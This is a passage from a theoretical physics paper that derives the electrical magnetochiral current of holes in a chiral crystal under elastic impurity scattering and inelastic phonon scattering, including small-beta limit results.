\[f_{0}(\mathbf{k}_{\perp},k_{z}-\delta k_{z})=f_{0}(\mathbf{k})-\frac{\partial f_{0}}{ \partial k_{z}}\delta k_{z}+\frac{1}{2}\frac{\partial^{2}f_{0}}{\partial k_{ z}^{2}}(\delta k_{z})^{2}\:.\] The linear term contributes to the Ohmic current while the nonlinear contribution is \[\delta j_{z}=e\sum_{\mathbf{k}}v_{z}\frac{\partial^{2}f_{0}}{\partial k_{z}^{2}}( \delta k_{z})^{2}=\frac{e^{3}\tau^{2}E_{z}^{2}}{\hbar^{3}}\sum_{\mathbf{k}}\frac{ \partial^{3}\varepsilon_{\mathbf{k}}}{\partial k_{z}^{3}}f_{0}(\varepsilon_{\mathbf{ k}})\:.\] This equation differs from Eq. (14) only by a factor of 2 which reflects the simplified character of the latter consideration. ## V Mechanism due to elastic scattering Now we consider the eMCh current formed in the process of elastic scattering by short-range impurities. In this case the collision integral reads \[\hat{\mathcal{I}}_{\mathbf{k}}^{(\text{el})}[f]=\frac{2\pi}{\hbar}\mathcal{N}_{i} \sum_{\mathbf{k}^{\prime}}|V_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}\delta(\varepsilon_{\mathbf{ k}}-\varepsilon_{\mathbf{k}^{\prime}})(f_{\mathbf{k}}-f_{\mathbf{k}^{\prime}}), \tag{21}\] where \(\mathcal{N}_{i}\) is the impurity concentration, and \(V_{\mathbf{k}^{\prime}\mathbf{k}}\) is the matrix element of scattering by an individual impurity potential \(V(\mathbf{r})=V_{0}\delta(\mathbf{r})\) given by \(V_{\mathbf{k}^{\prime}\mathbf{k}}=V_{0}\left\langle u_{k_{z}^{\prime}}\middle|u_{k_{z} }\right\rangle\), with \(u_{k_{z}}\) being the eigenvectors of the Hamiltonian (3). For the mechanism under consideration all the nonequilibrium corrections to the distribution function \(f_{\mathbf{k}}\) vanish after averaging over \(\mathbf{k}\) at the fixed energy. The role of corrections \(\delta f\) dependent on the energy \(\varepsilon_{\mathbf{k}}\) is analyzed in Sect. VII. ### Inversion of the collision integral at \(\mathbf{B}=\mathbf{0}\) At \(\mathbf{B}=0\) we obtain from Eq. (7): \[|V_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}=\frac{V_{0}^{2}}{2}[1+\eta(k_{z})\eta(k_{z}^{ \prime})+\zeta(k_{z})\zeta(k_{z}^{\prime})]. \tag{22}\] Below we use for brevity the notation \(\mathcal{I}_{\mathbf{k}}[f]\) instead of \(\mathcal{I}_{\mathbf{k}}^{(\text{el})}[f]\) for the elastic collision integral at \(\mathbf{B}=0\). It follows from Eq. (22) that, for the short-range scattering potential, the kernel of the elastic collision integral (21) is degenerate: It is a sum of products of functions depending solely on \(k_{z}\) or \(k_{z}^{\prime}\). This allows us to invert the operator \(\hat{\mathcal{I}}_{\mathbf{k}}[f]\) by reducing the following integral equation to the algebraic one \[G(k_{z},\varepsilon_{\mathbf{k}}^{0})+\hat{\mathcal{I}}_{\mathbf{k}}[f]=0\:, \tag{23}\] where the source function \(G(k_{z},\varepsilon_{\mathbf{k}}^{0})\) satisfies the integral condition \[\sum_{\mathbf{k}}G(k_{z},\varepsilon_{\mathbf{k}}^{0})\delta(\varepsilon_{\mathbf{k}}^{0}- \varepsilon)\propto\int\limits_{-\kappa(\varepsilon)}^{\kappa(\varepsilon)} \mathrm{d}k_{z}G(k_{z},\varepsilon)=0\:, \tag{24}\] which means that the number of particles of a given energy are conserved under elastic scattering. If the source function \(G(k_{z},\varepsilon_{\mathbf{k}}^{0})\) in the kinetic equation (23) does not satisfy the condition (24) it should be presented as a sum of the function satisfying this condition and the function \(G(\varepsilon_{\mathbf{k}}^{0})\) dependent purely on \(\varepsilon_{\mathbf{k}}^{0}\). In order to find the solution of the kinetic equation with the source \(G(\varepsilon_{\mathbf{k}}^{0})\) one must replace \(\hat{\mathcal{I}}_{\mathbf{k}}[f]\) in Eq. (23) by the inelastic collision integral \(\hat{\mathcal{I}}_{\mathbf{k}}^{(\text{inel})}[f]\), see Section VII. For an odd source term, \(G(k_{z},\varepsilon_{\mathbf{k}}^{0})=-G(-k_{z},\varepsilon_{\mathbf{k}}^{0})\), we obtain for the inverse operator \[\hat{\mathcal{I}}_{\mathbf{k}}^{-1}[G]=\frac{\hbar[G(k_{z},\varepsilon_{\mathbf{k}}^{0} )+\eta(k_{z})L_{G\eta}/\big{(}1-L_{\eta^{2}}\big{)}]}{2\pi g_{2D}\mathcal{N}_{i }V_{0}^{2}C(k_{z},\varepsilon_{\mathbf{k}}^{0})}\:, \tag{25}\] and for an even function \(G(k_{z},\varepsilon_{\mathbf{k}}^{0})=G(-k_{z},\varepsilon_{\mathbf{k}}^{0})\) we have \[\hat{\mathcal{I}}_{\mathbf{k}}^{-1}[G]=\frac{\hbar[G(k_{z},\varepsilon_{\mathbf{k}}^{0 })-\zeta(k_{z})L_{G}/L_{\zeta}]}{2\pi g_{2D}\mathcal{N}_{i}V_{0}^{2}C(k_{z}, \varepsilon_{\mathbf{k}}^{0})}\:, \tag{26}\] \[C(k_{z},\varepsilon_{\mathbf{k}}^{0})=\kappa(\varepsilon_{\mathbf{k}}^{0})+\frac{ \Delta_{2}}{\beta}\zeta(k_{z})\operatorname{Arctanh}\big{\{}\eta[\kappa( \varepsilon_{\mathbf{k}}^{0})]\big{\}}\:, \tag{27}\] where \(\operatorname{Arctanh}(z)=[\ln(1+z)-\ln(1-z)]/2\), and the function \(L_{F}(\varepsilon_{\mathbf{k}}^{0})\) is defined for any even-\(k_{z}\) function \(F(k_{z},\varepsilon_{\mathbf{k}}^{0})\) as follows \[L_{F}(\varepsilon_{\mathbf{k}}^{0})=\int\limits_{0}^{\kappa(\varepsilon_{\mathbf{k}}^ {0})}\mathrm{d}k_{z}\frac{F(k_{z},\varepsilon_{\mathbf{k}}^{0})}{C(k_{z},\varepsilon _{\mathbf{k}}^{0})}\:. \tag{28}\] By using the inverse collision integral we can calculate the conductivity \[\sigma_{zz}=2e\sum_{\mathbf{k}}v_{z}^{0}(\mathbf{k})\hat{\mathcal{I}}_{\mathbf{k}}^{-1} \big{[}-ev_{z}^{0}f_{0}^{\prime}\big{]}\:, \tag{29}\] where \(v_{z}^{0}=\hbar^{-1}\partial\varepsilon_{\mathbf{k}}^{0}/\partial k_{z}\) is the hole velocity in the absence of magnetic field. For degenerate hole statistics we have \[\sigma_{zz}=\frac{2e^{2}\hbar}{\pi\mathcal{N}_{i}V_{0}^{2}}\Bigg{(}L_{v^{2}}+ \frac{L_{v\eta}^{2}}{1-L_{\eta^{2}}}\Bigg{)}\:, \tag{30}\] where the functions \(L_{F}\) are taken at \(\varepsilon_{\mathbf{k}}^{0}=\varepsilon_{\text{F}}\). ### Allowance for linear-B term in collision integral Scattering by impurities is affected by the magnetic field. In the linear-\(\mathbf{B}\) approximation we obtain \[\delta\hat{\mathcal{I}}_{\mathbf{k}}[f]= \frac{2\pi}{\hbar}\mathcal{N}_{i}\sum_{\mathbf{k}^{\prime}}\biggl{[} \delta|V_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}\delta\big{(}\varepsilon_{\mathbf{k}}^{0}- \varepsilon_{\mathbf{k}^{\prime}}^{0}\big{)} \tag{31}\] \[+|V_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}\delta^{\prime}\big{(}\varepsilon_ {\mathbf{k}}^{0}-\varepsilon_{\mathbf{k}^{\prime}}^{0}\big{)}(\delta\varepsilon_{\mathbf{ k}}-\delta\varepsilon_{\mathbf{k}^{\prime}})\biggr{]}(f_{\mathbf{k}}-f_{\mathbf{k}^{ \prime}}).\] Here \(\delta\varepsilon_{\mathbf{k}}\) is given by Eq. (6), and, since the Hamiltonian (3) in the presence of \(B_{z}\) is obtained from its zero-field value by the sustitution \(k_{z}\to k_{z}+gB_{z}/\beta\), we have \[\delta|V_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}=\frac{gB_{z}}{\beta}\bigg{(}\frac{ \partial}{\partial k_{z}}+\frac{\partial}{\partial k_{z}^{\prime}}\bigg{)}|V_{ \mathbf{k}^{\prime}\mathbf{k}}|^{2}, \tag{32}\] which yields \[\delta|V_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}=V_{0}^{2}\frac{gB_{z}}{2 \Delta_{2}} \tag{33}\] \[\times\bigl{[}\eta^{2}(k_{z}^{\prime})-\eta^{2}(k_{z})\bigr{]} \bigl{[}\eta(k_{z}^{\prime})\zeta(k_{z})-\eta(k_{z})\zeta(k_{z}^{\prime}) \bigr{]}\:.\] Passing from summation to integration over the variables \((k_{z}^{\prime},\varepsilon_{\mathbf{k}^{\prime}}^{0})\) and integrating the term with \[\delta^{\prime}(\varepsilon_{\mathbf{k}}^{0}-\varepsilon_{\mathbf{k}^{\prime}}^{0})=- \frac{\partial\delta(\varepsilon_{\mathbf{k}}^{0}-\varepsilon_{\mathbf{k}^{\prime}}^{0}) }{\partial\varepsilon_{\mathbf{k}^{\prime}}^{0}}\] by parts, we get \[\delta\hat{\mathcal{I}}_{\mathbf{k}}[f]=\frac{2\pi}{\hbar}\mathcal{N}_{i }g_{2D}\] \[\times\Bigg{\{}\int\limits_{-\kappa(\varepsilon_{\mathbf{k}}^{0})}^{ \kappa(\varepsilon_{\mathbf{k}}^{0})}\mathrm{d}k_{z}^{\prime}\delta|V_{\mathbf{k}^{ \prime}\mathbf{k}}|^{2}\bigl{[}f(\varepsilon_{\mathbf{k}}^{0},k_{z})-f(\varepsilon_{ \mathbf{k}}^{0},k_{z}^{\prime})\bigr{]}\] \[\quad+f_{\mathbf{k}}\frac{\mathrm{d}}{\mathrm{d}\varepsilon_{\mathbf{k}}^{0 }}\int\limits_{-\kappa(\varepsilon_{\mathbf{k}}^{0})}^{\kappa(\varepsilon_{\mathbf{k}}^{0 })}\mathrm{d}k_{z}^{\prime}|V_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}(\delta\varepsilon_{ \mathbf{k}}-\delta\varepsilon_{\mathbf{k}^{\prime}})\] \[-\frac{\mathrm{d}}{\mathrm{d}\varepsilon_{\mathbf{k}}^{0}}\int\limits_ {-\kappa(\varepsilon_{\mathbf{k}}^{0})}^{\kappa(\varepsilon_{\mathbf{k}}^{0})}\mathrm{d}k _{z}^{\prime}|V_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}(\delta\varepsilon_{\mathbf{k}}-\delta \varepsilon_{\mathbf{k}^{\prime}})f(\varepsilon_{\mathbf{k}}^{0},k_{z}^{\prime})\Bigg{\}}. \tag{34}\] Here we took into account that both \(|V_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}\) and \(\delta\varepsilon_{\mathbf{k}}\) are independent of \(\varepsilon_{\mathbf{k}}^{0}\) and dependent on \(k_{z},k_{z}^{\prime}\) only. ### Procedure to calculate the eMCh current According to Eq. (31) or (34), at nonzero magnetic field the kinetic equation takes the form \[\frac{e}{\hbar}E_{z}\frac{\partial f_{\mathbf{k}}}{\partial k_{z}}+\hat{\mathcal{I}}_{ \mathbf{k}}[f]+\delta\hat{\mathcal{I}}_{\mathbf{k}}[f]=0\:. \tag{35}\] The equilibrium hole gas is described by the Fermi-Dirac distribution function (15) satisfying the identity \[\delta\hat{\mathcal{I}}_{\mathbf{k}}\bigl{[}f_{0}(\varepsilon_{\mathbf{k}}^{0})\bigr{]} +\hat{\mathcal{I}}_{\mathbf{k}}\bigl{[}f_{0}^{\prime}(\varepsilon_{\mathbf{k}}^{0}) \delta\varepsilon_{\mathbf{k}}\bigr{]}=0\:, \tag{36}\] which is Eq. (35) at \(E_{z}=0\). The correction to the distribution function proportional to \(E_{z}^{2}B_{z}\) can be found by iterations of the kinetic equation (35). First of all, we find a linear-\(E_{z}\) correction \(f_{\mathbf{k}}^{(E)}\) at \(B_{z}=0\). It is given by \(f_{\mathbf{k}}^{(E)}=-eE_{z}\hat{\mathcal{I}}_{\mathbf{k}}^{-1}[v_{z}f_{0}^{\prime}]\), see Eq. (29). The required solution \(\delta f_{\mathbf{k}}\propto E_{z}^{2}B_{z}\) is sought as a sum of two corrections labeled \(f_{\mathbf{k}}^{(E^{2}B)}\) and \(f_{\mathbf{k}}^{(EBE)}\). To calculate \(f_{\mathbf{k}}^{(E^{2}B)}\) we perform the next iteration and find the correction \(f_{\mathbf{k}}^{(E^{2})}\propto E_{z}^{2}\) at \(B_{z}=0\) from the equation \[\frac{eE_{z}}{\hbar}\Bigg{(}\frac{\partial f_{\mathbf{k}}^{(E)}}{\partial k_{z}}- \overline{\ Here the bar denotes averaging over \(k_{z}\) at a fixed energy \(\varepsilon_{\mathbf{k}}^{0}\), namely, \[\overline{F}=\frac{1}{2\kappa(\varepsilon_{\mathbf{k}}^{0})}\int\limits_{-\kappa( \varepsilon_{\mathbf{k}}^{0})}^{\kappa(\varepsilon_{\mathbf{k}}^{0})}\mathrm{d}k_{z}F( k_{z},\varepsilon_{\mathbf{k}}^{0})\:. \tag{38}\] Then we include into consideration the magnetic field \(B_{z}\) and find \(f_{\mathbf{k}}^{(E^{2}B)}\) as a solution of the linear equation \[\delta\hat{\mathcal{I}}_{\mathbf{k}}\Big{[}f_{\mathbf{k}}^{(E^{2})}\Big{]}+\hat{ \mathcal{I}}_{\mathbf{k}}\Big{[}f^{(E^{2}B)}\Big{]}=0\:. \tag{39}\] In order to determine the second contribution, \(f_{\mathbf{k}}^{(EBE)}\), we first find the correction \(f_{\mathbf{k}}^{(EB)}\propto E_{z}B_{z}\). It satisfies the equation \[\frac{e}{\hbar}E_{z}\Bigg{[}\frac{\partial(f_{0}^{\prime}\delta \varepsilon_{\mathbf{k}})}{\partial k_{z}}-\frac{\overline{\partial(f_{0}^{ \prime}\delta\varepsilon_{\mathbf{k}})}}{\partial k_{z}}\Bigg{]} \tag{40}\] \[+ \delta\hat{\mathcal{I}}_{\mathbf{k}}\Big{[}f^{(E)}\Big{]}-\overline {\delta\hat{\mathcal{I}}_{\mathbf{k}}\big{[}f^{(E)}\big{]}}+\hat{\mathcal{I}}_{ \mathbf{k}}\Big{[}f^{(EB)}\Big{]}=0\:.\] Finally we substitute the correction \(f_{\mathbf{k}}^{(EB)}\) to \[\frac{eE_{z}}{\hbar}\frac{\partial f_{\mathbf{k}}^{(EB)}}{\partial k_{z}}+\hat{ \mathcal{I}}_{\mathbf{k}}\Big{[}f^{(EBE)}\Big{]}=0 \tag{41}\] and find \(f_{\mathbf{k}}^{(EBE)}\). It should be noted that both \(f_{\mathbf{k}}^{(E)}\) and the resulting functions \(f_{\mathbf{k}}^{(E^{2}B)},f_{\mathbf{k}}^{(EBE)}\) are odd in \(k_{z}\), whereas those obtained at intermediate iteration steps, \(f_{\mathbf{k}}^{(E^{2})}\) and \(f^{(EB)}\), are even functions of \(k_{z}\). For the mechanism due to elastic scattering all these functions satisfy the integral condition (24). The eMCh current is calculated according to Eq. (9) as follows \[\delta j_{z}=2e\sum_{\mathbf{k}}\Big{[}v_{z}^{0}\Big{(}f_{\mathbf{k}}^{(EBE)}+f_{\mathbf{ k}}^{(E^{2}B)}\Big{)}+\delta v_{z}f_{\mathbf{k}}^{(E^{2})}\Big{]}. \tag{42}\] Here, following Eq. (4) we present the hole velocity as \(v_{z}=v_{z}^{0}+\delta v_{z}\) with \[v_{z}^{0}(k_{z})=\frac{1}{\hbar}\left[2\mathcal{A}_{1}k_{z}+ \beta\eta(k_{z})\right]\:, \tag{43}\] \[\delta v_{z}(k_{z})=gB_{z}\frac{\beta}{\hbar\Delta_{2}}\zeta^{3} (k_{z})\:. \tag{44}\] ## VI The magnetochiral current in the small \(\beta\) limit At small \(\beta\), the equation (18) derived in the relaxation-time approximation reduces to \[G_{zzzz}\approx g\frac{\mathcal{A}_{1}}{\mathcal{A}_{2}}\frac{e^{3}\tau^{2}}{ \pi^{2}\hbar^{3}}z^{3}\:, \tag{45}\] where \(z=\beta\kappa_{F}/\Delta_{2}\). Here we go beyond the relaxation-time approximation, apply the scheme developed in the previous Section and calculate each of three contributions to the eMCh current (42) assuming the constant \(\beta\) to be small. In the limit \(\beta\to 0\), we have approximately \[C(k_{z},\varepsilon_{\mathbf{k}}^{0})\approx 2\kappa(\varepsilon_{\mathbf{k}}^{0}) \:,\:\kappa(\varepsilon_{\mathbf{k}}^{0})\approx\sqrt{\frac{\varepsilon_{\mathbf{k}}^{ 0}}{\mathcal{A}_{1}}}\:,\:|V_{\mathbf{k^{\prime}}\mathbf{k}}|^{2}\approx V_{0}^{2}\:,\] \[\varepsilon_{\mathbf{k}}^{0}\approx\mathcal{A}_{1}k_{z}^{2}+ \mathcal{A}_{2}k_{\perp}^{2}\:,\:\:\:\:\:\:v_{z}^{0}\approx\frac{2\mathcal{A} _{1}k_{z}}{\hbar}\:, \tag{46}\] and the inverted collision integral is given by \[\hat{\mathcal{I}}_{\mathbf{k}}^{-1}[G]\approx-\tau(\varepsilon_{\mathbf{k}}^{0})G(k_{z },\varepsilon_{\mathbf{k}}^{0})\:,\:\tau(\varepsilon_{\mathbf{k}}^{0})=\frac{2\pi \mathcal{A}_{2}\hbar}{\mathcal{N}_{i}V_{0}^{2}\kappa(\varepsilon_{\mathbf{k}}^{0}) }\:. \tag{47}\] In the magnetic-field induced correction to the energy spectrum we take into account the cubic-\(\beta\) term because, as discussed above, the linear-\(\beta\) correction does not result in eMChA. Therefore we take \[\delta\varepsilon_{\mathbf{k}}\approx-\frac{gB_{z}}{2}\bigg{(}\frac{\beta k_{z}}{ \Delta_{2}}\bigg{)}^{3},\quad\delta v_{z}\approx-\frac{3gB_{z}}{2\hbar} \bigg{(}\frac{\beta}{\Delta_{2}}\bigg{)}^{3}k_{z}^{2}. \tag{48}\] The \(B_{z}\)-linear correction to the scattering matrix element squared reads \[\delta|V_{\mathbf{k^{\prime}}\mathbf{k}}|^{2}\approx\frac{V_{0}^{2}}{2}\frac{gB_{z}}{ \Delta_{2}}\bigg{(}\frac{\beta k_{z}}{\Delta_{2}}\bigg{)}^{3}\big{(}k_{z}^{ \prime 2}-k_{z}^{2}\big{)}(k_{z}^{\prime}-k_{z}). \tag{49}\] It can be neglected in the following because its contribution to the current is parametrically smaller by a factor of \(\varepsilon_{\mathrm{F}}/\Delta_{2}\ll 1\) compared with other contributions coming from the \(B_{z}\)-linear correction (48). As a result, only two last lines of Eq. (34) contribute to \(\delta\hat{\mathcal{I}}_{\mathbf{k}}[f]\): \[\delta\hat{\mathcal{I}}_{\mathbf{k}}[f]=\frac{1}{\kappa\tau}\Bigg{[}f_{\mathbf{k}} \delta\varepsilon_{\mathbf{k}}\frac{\mathrm{d}\kappa}{\mathrm{d}\varepsilon_{\mathbf{k} }^{0}}+\frac{1}{2}\int\limits_{-\kappa(\varepsilon_{\mathbf{k}}^{0})}^{\kappa( \varepsilon_{\mathbf{k}}^{0})}\mathrm{d}k_{z}^{\prime}\delta\varepsilon_{\mathbf{k^{ \prime}}}\frac{\partial f(\varepsilon_{\mathbf{k}}^{0},k_{z}^{\prime})}{\partial \varepsilon_{\mathbf{k}}^{0}}\Bigg{]}\:. \tag{50}\] We start from calculation of the third term in the right-hand side of Eq. (42). The correction \(f_{\mathbf{k}}^{(E^{2})}\) found from Eq. (37) with \(f_{\mathbf{k}}^{(E)}=-eE_{z}\tau v_{z}f_{0}^{\prime}\) is given by \[f_{\mathbf{k}}^{(E^{2})}=\bigg{(}2\mathcal{A}_{1}\frac{eE_{z}}{\hbar}\bigg{)}^{2} \tau(\tau f_{0}^{\prime})^{\prime}\bigg{(}k_{z}^{2}-\frac{\kappa^{2}}{3}\bigg{)}. \tag{51}\] Substituting this function into the last term in Eq. (42) we find its contribution to the eMChA effect \[G_{zzzz}^{(v)}=-\frac{32\mathcal{A}_{1}^{2}ge^{3}\tau}{15\hbar^{3}}\bigg{(} \frac{\beta}{\Delta_{2}}\bigg{)}^{3}g_{2D}\frac{\partial[\kappa_{\mathrm{F}}^{5} \tau(\varepsilon_{\mathrm{F}})]}{\partial\varepsilon_{\mathrm{F}}}. \tag{52}\] Using the relations \(\kappa_{\mathrm{F}}\propto\varepsilon_{\mathrm{F}}^{1/2}\), \(\tau(\varepsilon_{\mathrm{F}})\propto\varepsilon_{\mathrm{F}}^{-1/2}\), \(\mathcal{A}_{1}\kappa_{\mathrm{F}}^{2}=\varepsilon_{\mathrm{F}}\), we arrive at \[G_{zzzzz}^{(v)}=-\frac{8}{15}g\frac{\mathcal{A}_{1}}{\mathcal{A}_{2}}\frac{e^{3} \tau^{2}}{\pi^{2}\hbar^{3}}z^{3}\:. \tag{53}\] Next, we search for the correction \(f_{\mathbf{k}}^{(E^{2}B)}\). It is found from Eq. (39) to be as follows, see Eq. (50)), \[f_{\mathbf{k}}^{(E^{2}B)}=gB_{z}\bigg{(}\frac{\beta k_{z}}{\Delta_{2}}\bigg{)}^{3} \frac{1}{2\kappa}\frac{\mathrm{d}\kappa}{\mathrm{d}\varepsilon_{\mathbf{k}}^{2}}f_ {\mathbf{k}}^{(E^{2})}\;, \tag{54}\] where \(f_{\mathbf{k}}^{(E^{2})}\) is given by Eq. (51). This allows us to calculate the second contribution in Eq. (42): \[G_{zzzz}^{(E^{2}B)}=\frac{16}{105}g\frac{\mathcal{A}_{1}}{\mathcal{A}_{2}} \frac{e^{3}\tau^{2}}{\pi^{2}\hbar^{3}}z^{3}\,. \tag{55}\] Finally we calculate the contribution related to the function \(f_{\mathbf{k}}^{(EBE)}\). According to Eq. (41) this function has the form \[f_{\mathbf{k}}^{(EBE)}=-\tau\frac{eE_{z}}{\hbar}\frac{\partial f_{\mathbf{k}}^{(EB)}}{ \partial k_{z}}\;. \tag{56}\] It allows us to rewrite the first contribution in Eq. (42) as \[j_{z}^{(EBE)}=2e^{2}E_{z}\bigg{(}\frac{2\mathcal{A}_{1}}{\hbar}\bigg{)}^{2} \sum_{\mathbf{k}}f_{\mathbf{k}}^{(EB)}\tau^{\prime}k_{z}^{2}\,. \tag{57}\] While deriving this equation we took into account that the function \(f_{\mathbf{k}}^{(EB)}\) satisfies Eq. (24). The solution of Eq. (40) for \(f_{\mathbf{k}}^{(EB)}\) reads \[f_{\mathbf{k}}^{(EB)}= \frac{gB_{z}eE_{z}\tau}{2\hbar}\bigg{(}\frac{\beta}{\Delta_{2}} \bigg{)}^{3}\bigg{[}3f_{0}^{\prime}\bigg{(}k_{z}^{2}-\frac{\kappa^{2}}{3} \bigg{)} \tag{58}\] \[\qquad+\mathcal{A}_{1}\bigg{(}2f_{0}^{\prime\prime}-\frac{f_{0}^ {\prime}}{\varepsilon_{\mathbf{k}}^{2}}\bigg{)}\bigg{(}k_{z}^{4}-\frac{\kappa^{4} }{5}\bigg{)}\bigg{]}\;.\] Substitution of this expression to Eq. (57) leads to \[G_{zzzz}^{(EBE)}=-\frac{2}{105}g\frac{\mathcal{A}_{1}}{\mathcal{A}_{2}}\frac{ e^{3}\tau^{2}}{\pi^{2}\hbar^{3}}z^{3}\;. \tag{59}\] The sum of three contributions (52), (55) and (59) yields \[G_{zzzz}=-\frac{2}{5}g\frac{\mathcal{A}_{1}}{\mathcal{A}_{2}}\frac{e^{3}\tau ^{2}}{\pi^{2}\hbar^{3}}z^{3}\;, \tag{60}\] where \(\tau\) is defined by Eq. (47). Comparing with the relaxation-time approximation result (45) we see a difference both in the sign and a factor of \(2/5\). ## VII Mechanism involving inelastic scattering Now we turn to the mechanism of magnetochiral current involving the inelastic scattering. Compared to the previous section we change the attention from the asymmetric part of \(\delta f_{\mathbf{k}}\) satisfying condition (24) to the energy-dependent part \(\delta f(\varepsilon_{\mathbf{k}})\) of the correction to the hole distribution function. Assuming the hole-hole collisions to be more effective than the hole energy relaxation on acoustic phonons we can describe the energy-dependent sum \(f_{0}(\varepsilon_{\mathbf{k}})+\delta f(\varepsilon_{\mathbf{k}}^{0})\) as the Fermi-Dirac distribution function \(f_{0}(\varepsilon_{\mathbf{k}},T_{h})\) characterized by the hole temperature \(T_{h}\) different from the bath temperature \(T\). Here we first briefly describe the procedure to calculate \(T_{h}\) and then show how the inelastic relaxation of hole nonequilibrium distribution \(f_{0}(\varepsilon_{\mathbf{k}},T_{h})\) gives rise to an electric current proportional to \((T_{h}-T)B_{z}\). ### Estimation of the hole effective temperature \(\propto E_{z}^{2}\) The effective temperature \(T_{h}\) can be found from the heat balance equation \[\sigma_{zz}E_{z}^{2}=\mathcal{J}\;. \tag{61}\] The left-hand side represents Joule heating produced by the passage of an electric current with \(\sigma_{zz}\) being the conductivity. The right-hand side describes the energy relaxation of the holes following acoustic-phonon scattering and has the form \[\mathcal{J}=\sum_{\mathbf{k}^{\prime}\mathbf{k}}\left(\varepsilon_{\mathbf{k}}-\varepsilon _{\mathbf{k}^{\prime}}\right)\left(W_{\mathbf{k}^{\prime},\mathbf{k}}^{\rm(ab)}-W_{\mathbf{k}, \mathbf{k}^{\prime}}^{\rm(em)}\right)\,, \tag{62}\] where \(W_{\mathbf{k}^{\prime},\mathbf{k}}^{\rm(ab)}\), \(W_{\mathbf{k},\mathbf{k}^{\prime}}^{\rm(em)}\) are the hole scattering rates for phonon absorption and emission processes. Their difference is given by \[W_{\mathbf{k}^{\prime},\mathbf{k}}^{\rm(ab)}-W_{\mathbf{k},\mathbf{k}^{\prime}}^{ \rm em}= \frac{2\pi}{\hbar}|M_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}\delta(\varepsilon_{\bm {k}^{\prime}}-\varepsilon_{\mathbf{k}}-\hbar\Omega_{\mathbf{q}}) \tag{63}\] \[\times \left[(f_{\mathbf{k}}-f_{\mathbf{k}^{\prime}})N_{\mathbf{q}}-f_{\mathbf{k}^{ \prime}}(1-f_{\mathbf{k}})\right]\,.\] Here \(\mathbf{q}=\mathbf{k}^{\prime}-\mathbf{k}\), \(\Omega_{\mathbf{q}}\) and \(N_{\mathbf{q}}\) are the phonon wave vector, frequency and occupation number \[N_{\mathbf{q}}=\frac{1}{\exp(\hbar\Omega_{\mathbf{q}}/k_{B}T)-1}\;,\] \(M_{\mathbf{k}^{\prime}\mathbf{k}}\) is the scattering matrix element. For the energy-dependent distribution function \(f_{0}(\varepsilon_{\mathbf{k}},T_{h})\) the term in the brackets in Eq. (63) reduces to \[\frac{\mathrm{e}^{(\varepsilon-\varepsilon_{F})/k_{B}T_{h}} \left[\mathrm{e}^{(\varepsilon^{\prime}-\varepsilon)/k_{B}T_{h}}-\mathrm{e}^{( \varepsilon^{\prime}-\varepsilon)/k_{B}T}\right]}{(\mathrm{e}^{(\varepsilon- \varepsilon_{F})/k_{B}T_{h}}+1)(\mathrm{e}^{(\varepsilon-\varepsilon^{\prime})/k_{ B}T_{h}}+1)(\mathrm{e}^{(\varepsilon^{\prime}-\varepsilon)/k_{B}T-1})}\] \[\approx -\frac{T_{h}-T}{T}\frac{\hbar\Omega_{\mathbf{q}}/k_{B}T}{\mathrm{e}^{ \hbar\Omega_{\mathbf{q}}/k_{B}T}-1}f_{0}(\varepsilon)\left[1-f_{0}(\varepsilon^{ \prime})\right]\,,\] where \(\varepsilon=\varepsilon_{\mathbf{k}}^{0}\), \(\varepsilon^{\prime}=\varepsilon_{\mathbf{k}^{\prime}}^{0}\). For the degenerate statistics, \(\varepsilon_{F}\gg k_{B}T\), a reasonable estimation of \(\mathcal{J}\) in Eqs. (61), (62) is \[\mathcal{J}\sim\Delta\varepsilon\frac{T_{h}-T}{T}\frac{\rho(\varepsilon_{F})k_{B}T }{\tau_{\rm in}}=k_{B}(T_{h}-T)\frac{\rho(\varepsilon_{F})\Delta\varepsilon}{ \tau_{\rm in}}\,, \tag{64}\] where \(\Delta\varepsilon=\min\left(\hbar\Omega_{k_{F}},k_{B}T\right)\), and \(\rho(\varepsilon)\) is the 3D density of states. The characteristic inelastic-scattering time \(\tau_{in}\) is defined by \[\frac{1}{\tau_{in}}=\frac{2\pi}{\hbar}\sum_{\mathbf{k}^{\prime}}|M_{\mathbf{k}^{\prime} \mathbf{k}}|^{2}\delta(\varepsilon_{\mathbf{k}^{\prime}}^{0}-\varepsilon_{\mathbf{k}}^{0}) \tag{65}\] for \(\varepsilon_{\mathbf{k}}^{0}=\varepsilon_{F}\). Equations (61) and (64) allow one to estimate the heating of the hole gas. ### Current driven by energy relaxation The energy-dependent nonequilibrium function \(f(\varepsilon_{\mathbf{k}},T_{h})\) makes no contribution to the current (9). However, an electric current appears due to the inelastic relaxation of this distribution to \(f(\varepsilon_{\mathbf{k}},T)\equiv f_{0}(\varepsilon_{\mathbf{k}})\). The current is given by \[\delta j_{z}=-e\sum_{\mathbf{k}}\tau v_{z}^{(0)}(k_{z})\mathcal{I}_{\mathbf{k}}^{(ne)} \{f\}\;, \tag{66}\] where the inelastic collision integral has the form \[\mathcal{I}_{\mathbf{k}}^{(ne)}\{f\}=\frac{2\pi}{\hbar}\sum_{\mathbf{k}^ {\prime}}|M_{\mathbf{k}^{\prime}\mathbf{k}}|^{2} \tag{67}\] \[\{\left[(f_{\mathbf{k}}-f_{\mathbf{k}^{\prime}})N_{\mathbf{q}}+f_{\mathbf{k}}(1- f_{\mathbf{k}^{\prime}})\right]\delta(\varepsilon_{\mathbf{k}^{\prime}}-\varepsilon_{ \mathbf{k}}+\hbar\Omega_{\mathbf{q}})\] \[+\left[(f_{\mathbf{k}}-f_{\mathbf{k}^{\prime}})N_{\mathbf{q}}-f_{\mathbf{k}^{ \prime}}(1-f_{\mathbf{k}})\right]\delta(\varepsilon_{\mathbf{k}^{\prime}}-\varepsilon_ {\mathbf{k}}-\hbar\Omega_{\mathbf{q}})\}\;,\] with \(f_{\mathbf{k}}=f_{0}(\varepsilon_{\mathbf{k}},T_{h})\) and \(\varepsilon_{\mathbf{k}}=\varepsilon_{\mathbf{k}}^{0}+\delta\varepsilon_{\mathbf{k}}\), see Eqs. (5) and (6). It is clear that the current is contributed by the 